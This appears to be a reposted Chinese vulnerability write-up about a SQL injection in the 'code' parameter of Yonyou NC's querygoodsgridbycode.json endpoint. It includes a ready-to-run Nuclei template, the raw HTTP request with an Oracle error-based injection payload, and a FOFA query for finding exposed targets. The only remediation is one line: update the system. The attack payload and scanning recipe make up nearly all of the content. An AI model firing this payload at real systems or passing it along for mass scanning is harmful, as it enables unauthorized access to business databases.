用友NC系统querygoodsgridbycode接口处code参数存在SQL注入漏洞【漏洞复现|附nuclei-POC】
来源地址:https://mp.weixin.qq.com/s/juDXdEU3pk7q_fJW4CmW3g
漏洞描述:
01
—
Nuclei POC
id: yongyou-querygoodsgridbycode-SQLinfname: 用友NC系统querygoodsgridbycode接口的code参数存在SQL注入漏洞author: kingkongseverity: highmetadata:fofa-query: app="用友-UFIDA-NC"http:- raw:- |GET /ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28116%29%7C%7CCHR%28101%29%7C%7CCHR%28115%29%7C%7CCHR%28116%29%7C%7CCHR%2849%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%2850%29%7C%7CCHR%28116%29%7C%7CCHR%28101%29%7C%7CCHR%28115%29%7C%7CCHR%28116%29%29--+dpxi HTTP/1.1Host: {{Hostname}}Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Pragma: no-cacheAccept-Language: zh-CN,zh;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Cache-Control: no-cachematchers-condition: andmatchers:- type: wordwords:- "test112test"
02
—
搜索语法
FOFA:app="用友-UFIDA-NC""1">
界面如下
"2">
03
—
漏洞复现
"3">
漏洞检测POCGET /ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28116%29%7C%7CCHR%28101%29%7C%7CCHR%28115%29%7C%7CCHR%28116%29%7C%7CCHR%2849%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%2850%29%7C%7CCHR%28116%29%7C%7CCHR%28101%29%7C%7CCHR%28115%29%7C%7CCHR%28116%29%29--+dpxi HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: closeUpgrade-Insecure-Requests: 1
neclei批量检测截图
"4">
04
—
修复建议
更新当前系统至最新版
没有找到相关结果
已邀请:
0 个回复